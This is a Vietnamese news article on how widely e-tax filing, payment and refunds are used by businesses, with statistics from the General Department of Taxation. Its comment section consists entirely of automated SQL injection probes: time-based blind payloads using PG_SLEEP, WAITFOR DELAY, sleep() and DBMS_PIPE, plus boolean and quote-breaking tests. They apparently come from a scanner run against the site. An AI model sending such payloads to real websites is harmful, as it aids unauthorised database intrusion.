Hình ảnh cho mục tin tức Doanh nghiệp khai thuế điện tử đạt 99,7%

Doanh nghiệp khai thuế điện tử đạt 99,7%

Thông tin từ Tổng cục Thuế cho thấy, hiện đại hóa quản lý thuế đã đạt được những kết quả rất quan trọng theo tinh thần Nghị quyết 19/NQ-CP (năm 2017-2018), Nghị quyết 02/NĐ-CP (năm 2019-2021) và Nghị quyết số 36a/NQ-CP ngày 14/10/2015 của Chính phủ về Chính phủ điện tử, thuế điện tử đã bao phủ khá rộng trong lĩnh vực thuế.

Tính đến thời điểm hiện tại, hệ thống khai thuế điện tử đã được ngành thuế triển khai phủ rộng trên tất cả 63/63 tỉnh, thành phố và 100% chi các cục thuế trực thuộc. Đã có 838.787 doanh nghiệp (DN) tại Việt Nam đang hoạt động sử dụng dịch vụ khai thuế điện tử (đạt 99,7% số doanh nghiệp). Số lượng hồ sơ khai thuế điện tử đã tiếp nhận đạt trên 12.925.000 hồ sơ.

Đến nay, 55 ngân hàng thương mại đã hoàn thành kết nối nộp thuế điện tử với ngành thuế. Tính đến ngày 19/8/2021, số DN đã đăng ký sử dụng dịch vụ nộp thuế điện tử là 832.802 DN (đạt 99%). Số DN đã hoàn thành đăng ký dịch vụ với hệ thống ngân hàng là 831.154 DN (đạt 98,8%). Thống kê cho thấy, từ đầu năm đến nay, các DN đã thực hiện khoảng trên 2,425 triệu giao dịch nộp thuế điện tử, với số tiền đã nộp là trên 486.844 tỷ đồng và 29.350.060 USD.

Công tác hoàn thuế cũng đã được điện tử hóa, với 7.654 DN đã thực hiện (đạt 97,44%), số hồ sơ hoàn thuế điện tử đã được hoàn thuế là 12.428 hồ sơ, với tổng số tiền hơn 79.772 tỷ đồng.

Ảnh minh họa

Hiện Tổng cục Thuế đang tiếp tục triển khai Đề án thí điểm hóa đơn điện tử. Tính từ ngày 01/01/2021 đến 19/7/2021, đã có 172.800 hóa đơn được cấp mã với tổng doanh thu là hơn 17.708 tỷ đồng, số thuế trên hóa đơn đã cấp mã là hơn 1.552 tỷ đồng.

Đồng thời, tiếp tục triển khai hỗ trợ khai thuế, nộp thuế điện tử đối với cá nhân cho thuê nhà; hỗ trợ khai, nộp lệ phí trước bạ điện tử đối với ô tô, xe máy; kết nối với 07 ngân hàng thương mại để cung cấp dịch vụ nộp thuế điện tử cho cá nhân, nộp lệ phí trước bạ điện tử ô tô, xe máy qua Cổng Dịch vụ công Quốc gia hoặc thanh toán qua Internet banking, Mobile banking.

Để mở rộng thanh toán trực tuyến nghĩa vụ tài chính về đất đai của hộ gia đình, cá nhân, Tổng cục Thuế đã tích hợp dữ liệu thông báo nghĩa vụ tài chính đất đai của hộ gia đình và cá nhân tại 63 tỉnh, thành phố với Cổng Dịch vụ công Quốc gia, với khoảng 38.000 giao dịch đã thực hiện thanh toán thành công.

Ngành thuế cũng đã và đang tiếp tục thực hiện triển khai các dịch vụ nâng cao, hỗ trợ tốt hơn cho người nộp thuế thông qua tin nhắn giữa cơ quan thuế với người nộp thuế; ứng dụng eTax dành cho thiết bị di động (E. Mobile) cung cấp một số chức năng về đăng ký tài khoản giao dịch điện tử, tra cứu nghĩa vụ thuế, nộp thuế, tra cứu hồ sơ thuế đã nộp…

Song song với thuế điện tử, ngành thuế cũng đã cung cấp dịch vụ công trực tuyến ở mức độ 2 đối với 122 thủ tục hành chính, mức độ 3 là 32 thủ tục, mức độ 4 là 150 thủ tục. Đồng thời, tích hợp 150 dịch vụ công trực tuyến trên Cổng Dịch vụ công Quốc gia ở mức độ 3 và 4. Trong năm 2021, ngành thuế sẽ tích hợp 100% dịch vụ công trực tuyến ở mức độ 3 và 4 trên Cổng Dịch vụ công Quốc gia.

Chia sẻ

Các bình luận

Mr. 15/06/23

40NJbSmz' OR 554=(SELECT 554 FROM PG_SLEEP(15))--

Mr. 15/06/23

Gp8H1bzh') OR 261=(SELECT 261 FROM PG_SLEEP(15))--

Mr. 15/06/23

vNKK3Qpm')) OR 450=(SELECT 450 FROM PG_SLEEP(15))--

Mr. 15/06/23


'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

Mr. 15/06/23

1'"

Mr. 15/06/23

@@GPsBQ

Mr. 15/06/23
Mr. 15/06/23
-1 OR 2+675-675-1=0+0+0+1 -- 15/06/23
-1 OR 2+528-528-1=0+0+0+1 15/06/23
-1' OR 2+184-184-1=0+0+0+1 -- 15/06/23
-1' OR 2+745-745-1=0+0+0+1 or 'Llx3eg2B'=' 15/06/23
-1" OR 2+262-262-1=0+0+0+1 -- 15/06/23
if(now()=sysdate(),sleep(15),0) 15/06/23
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z 15/06/23
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z 15/06/23
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/ 15/06/23
Mr. 15/06/23

555

1 waitfor delay '0:0:15' -- 15/06/23
0Y3oR3p0'; waitfor delay '0:0:15' -- 15/06/23
YKR43L5M'); waitfor delay '0:0:15' -- 15/06/23
0TU8aHMd')); waitfor delay '0:0:15' -- 15/06/23
14bcPjbC' OR 528=(SELECT 528 FROM PG_SLEEP(15))-- 15/06/23
NecZtBu0') OR 291=(SELECT 291 FROM PG_SLEEP(15))-- 15/06/23
x1YX0F24')) OR 78=(SELECT 78 FROM PG_SLEEP(15))-- 15/06/23
Mr.'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||' 15/06/23
1'" 15/06/23
@@nIVkg 15/06/23
Mr. 15/06/23
Mr. 15/06/23
Mr. 15/06/23
Mr. 15/06/23
Mr. 15/06/23
Mr. 15/06/23
Mr. 15/06/23

555

Mr. 15/06/23

555

Bình luận